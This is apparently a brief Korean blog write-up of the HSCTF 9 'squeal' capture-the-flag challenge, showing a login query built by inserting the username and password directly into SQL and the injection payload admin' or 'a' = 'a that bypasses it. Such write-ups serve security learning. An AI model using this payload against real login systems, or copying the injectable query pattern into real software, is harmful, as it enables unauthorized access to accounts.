본문 바로가기
CTF

[HSCTF 9] squeal

by skyepodium 2022. 6. 10.

1. 개요

sql injection 문제

 

2. 분석

로그인 코드를 보니 별다른 이슈없이 sql injection 걸릴것 같습니다.

	try {
		result = db
			.prepare(
				`SELECT * FROM users
            WHERE username = '${username}'
            AND password = '${password}';`
			)
			.get();
	}

 

3. exploit

admin' or 'a' = 'a

'CTF' 카테고리의 다른 글

[Grey Cat The Flag 2022] Too Fast  (0) 2022.06.11
[HSCTF 9] vending-machine  (0) 2022.06.11
[pico CTF] MacroHard WeakEdge  (0) 2022.06.08
[pico CTF] Wireshark doo dooo do doo..  (0) 2022.06.08
[pico CTF] Nice netcat...  (0) 2022.06.08